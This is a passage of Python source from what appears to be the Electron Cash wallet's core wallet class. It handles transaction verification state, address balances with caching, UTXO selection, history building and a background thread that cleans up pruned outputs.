self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map.
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified txs that are confirmed on-chain
(height > 0) and are still awaiting SPV verification.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
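# Return-value convention sketch for get_tx_height() (numbers are made up;
# 'wallet' is a hypothetical Abstract_Wallet subclass instance):
#
#   height, conf, timestamp = wallet.get_tx_height(tx_hash)
#   # verified tx   -> e.g. (634567, 3, 1600000000)
#   # unverified tx -> (server_reported_height, 0, 0)
#   # unknown tx    -> (0, 0, 0)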
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX for a 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
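# Sort-key sketch for get_txpos(): confirmed txs sort by (height, block
# position); unconfirmed txs map to roughly 1e9 so they sort after every
# confirmed tx; unknown txs map to (1e9 + 1, 0) and sort last. get_history()
# below relies on this, e.g. (hypothetical 'wallet'/'history' objects):
#
#   history.sort(key=lambda x: wallet.get_txpos(x[0]))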
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"""Effect of tx on address."""
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
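# Usage sketch for the delta namedtuples ('wallet' and 'tx' are hypothetical):
#
#   d = wallet.get_wallet_delta(tx)        # WalletDelta(is_relevant, is_mine, v, fee)
#   if d.is_relevant and d.is_mine:
#       print("net effect:", d.v, "fee:", d.fee)   # fee is None when not computable
#   # For the extended form (adds .spends_coins_mine) see get_tx_extended_info() below.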
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
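# Balance-tuple sketch (hypothetical 'wallet' and 'address' objects):
#
#   c, u, x = wallet.get_addr_balance(address)
#   # c = confirmed & matured, u = unconfirmed, x = unmatured (young coinbase)
#   total = c + u + x
#
# Results are cached per address unless frozen coins are excluded or the
# address has ever held a coinbase output (see the rationale above).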
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
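# Usage sketch for get_utxos() ('wallet' is hypothetical; the dict keys match
# those built in get_addr_utxo() above):
#
#   touched = set()
#   coins = wallet.get_utxos(exclude_frozen=True, mature=True,
#                            confirmed_only=False, addr_set_out=touched)
#   for coin in coins:
#       print(coin['prevout_hash'], coin['prevout_n'], coin['value'], coin['height'])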
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
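# Running-balance sketch for get_history(): entries are built newest-first,
# the newest entry carries the wallet's current total balance (c + u + x),
# and each older entry's balance is the newer entry's balance minus the
# newer tx's delta, i.e. roughly:
#
#   balance[i-1] = balance[i] - delta[i]    # walking backwards in time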
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
